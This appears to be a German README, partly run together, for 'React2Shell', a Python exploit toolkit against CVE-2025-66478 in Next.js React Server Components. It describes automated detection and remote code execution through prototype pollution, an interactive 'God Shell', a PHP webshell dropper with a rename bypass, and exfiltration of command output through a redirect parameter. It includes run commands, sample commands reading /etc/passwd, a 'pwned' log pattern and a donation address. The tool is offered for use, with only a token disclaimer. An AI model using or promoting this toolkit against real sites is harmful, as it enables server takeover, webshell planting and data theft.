
React2Shell - CVE-2025-66478 RCE Exploit
Dieses Python-Toolkit nutzt Next.js React Server Components (RSC) Prototype Pollution + React.lazy(-1)-Gadget-Kette für vollständigen RCE-Zugriff, einschließlich interaktiver God Shell, Datei-Upload (PHP-Webshell-Dropper) und Exfiltration über ?out=.

Automatisierte Erkennung & Ausnutzung verwundbarer Next.js-Apps (z. B. target.com). Erzeugt eine uid=33(www-data)-Shell mit:
child_process.execSync → /exploit?out=UIDread /etc/passwd), Uploads{\"0\":null} → 500 E{\"digest bestätigt den RSC-Handler.Location: /exploit?out=id_outputexecSync(cmd) → stdout/stderr per Redirect exfiltrieren.upload_txt local.txt remote.php → Write+Rename-Bypass.pip3 install aiohttppython3 main.pyhttp://target.com oder targets.txt1=Detect 2=PoC(id) 3=Custom 4=God Shell [4]Per Pipe: echo \"http://target\n4\" | python3 main.py
God-Shell-Befehle:
upload <local.php> <remote/shell.php> # Direct PHP upload
upload_txt <local> <remote/shell.php> # TXT→rename bypass
upload_bin <local> <remote> # Binaries (chmod later)
help / exit
id / cat /etc/passwd / ls -la /var/www/
React2Shell_Owned/pwned_YYYYMMDD_HHMMSS.txt[VULNERABLE] → uid=33(www-data)aiohttp
pip install aiohttp
Nur für autorisierte Penetrationstests & Bildungszwecke (Benutzer hat die Erlaubnis gemäß ToS bestätigt). Unautorisierte Nutzung ist illegal/unethisch.
Kauf mir einen Kaffee:
₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh
©2025 khadafigans